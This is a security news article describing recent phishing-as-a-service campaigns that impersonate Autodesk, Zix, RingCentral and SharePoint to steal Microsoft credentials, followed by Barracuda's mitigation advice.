Phishing campaigns targeting organisations globally have recently been observed using phishing-as-a-service (PhaaS) kits to evade detection and exploit vulnerabilities in security controls. The sophisticated attacks can trick recipients into divulging sensitive information, including login credentials, financial data, and confidential documents. PhaaS kits, which allow attackers to easily craft and deploy phishing campaigns, are becoming increasingly popular among threat actors. These kits can be purchased and leased on a subscription basis, making it an attractive option for attackers seeking to monetize their phishing efforts. Autodesk Construction Cloud Phishing Attacks
One notable example of a phishing campaign involves the Autodesk Construction Cloud, a widely used platform for collaboration within the construction industry. Attackers have been using the Tycoon PhaaS kit to impersonate trusted executives and send official-looking project notifications. These notifications appear to be legitimate, but they contain malicious links that lead to ZIP files. The contained HTML file launches a CAPTCHA screen, followed by a spoofed Microsoft login page designed to harvest credentials. This type of attack takes advantage of the trust that recipients have in Autodesk, making it challenging to detect.
- Attackers impersonate trusted executives to gain credibility.
- The phishing campaign exploits the trust that recipients have in Autodesk.
- The malicious links contain a CAPTCHA screen to evade detection.
Zix Secure Message Centre Phishing Campaign
Another example of a phishing campaign involves the Zix Secure Message Centre, an encrypted email service popular among organisations in healthcare, finance, legal, and government sectors. Attackers have been using this campaign to mimic the Zix service and trick recipients into divulging sensitive information. Victims receive an email about a supposed secure message, with a link to click to view it. The link takes users to a fake Zix page where they are asked to enter their email. They are then redirected to a fraudulent Microsoft login page designed to steal credentials.
- The phishing campaign exploits the trust that recipients have in the Zix Secure Message Centre.
- The fake Zix page is designed to mimic the real Zix service.
- The attackers use a CAPTCHA screen to evade detection.
RingCentral Voicemail Phishing with EvilProxy
A recent phishing campaign involves attackers impersonating RingCentral, a widely used business communication service. Victims receive apparent voicemail notifications with personalised details, encouraging them to click a playback button. The link initiates multiple redirections – first to a known newsletter provider, then onwards to legitimate cloud hosting, and finally to a verification step – before concluding at a phishing site hosted by the EvilProxy PhaaS kit. This attack is designed to bypass detection and steal Microsoft credentials, including those protected by two-factor authentication.
- The phishing campaign exploits the trust that recipients have in RingCentral.
- The attackers use multiple redirections to evade detection.
- The phishing site is hosted by the EvilProxy PhaaS kit.
Other Notable Threats
Researchers have identified further examples of credential theft and phishing tactics involving the Gabagool PhaaS kit, which exploits the file-sharing capabilities of the Notion.com platform by delivering phishing links within harmless-seeming PDF attachments. Meanwhile, campaigns were seen combining Microsoft SharePoint and Copilot branding to create believable ‘Document shared’ notifications, and using LogoKit with Roundcube webmail for password expiry deception.
| Phishing Kit | Attack Type | Target Sectors |
|---|---|---|
| Gabagool PhaaS kit | Credential theft and phishing | Finance, healthcare, legal, and government |
| EvilProxy PhaaS kit | Voicemail phishing and credential theft | Business and government sectors |
Mitigation and Protection
Barracuda advocates for multilayered security measures and employee awareness training to counter these evolving threats. The company’s Email Protection suite includes features such as Email Gateway Defence against phishing and malware, Impersonation Protection for social engineering attacks, Incident Response, and Domain Fraud Protection. According to Barracuda, the solution combines artificial intelligence and deep integration with Microsoft 365 to help guard organisations from highly targeted phishing and impersonation attacks.
“Phishing campaigns leveraging PhaaS kits are a growing concern for organisations worldwide. To protect against these threats, it’s essential to implement a multi-layered security strategy that includes email security, user awareness, and employee training. Our Email Protection suite offers a comprehensive solution to help organisations defend against phishing and impersonation attacks.”
Key Takeaways
* Phishing campaigns using PhaaS kits are becoming increasingly sophisticated and difficult to detect. * Attackers are using various tactics, including impersonation, credential theft, and social engineering, to trick recipients into divulging sensitive information. * Multilayered security measures and employee awareness training are essential to counter these evolving threats. * Barracuda’s Email Protection suite offers a comprehensive solution to help organisations defend against phishing and impersonation attacks.
news is a contributor at AntiVirusDon. We are committed to providing well-researched, accurate, and valuable content to our readers.
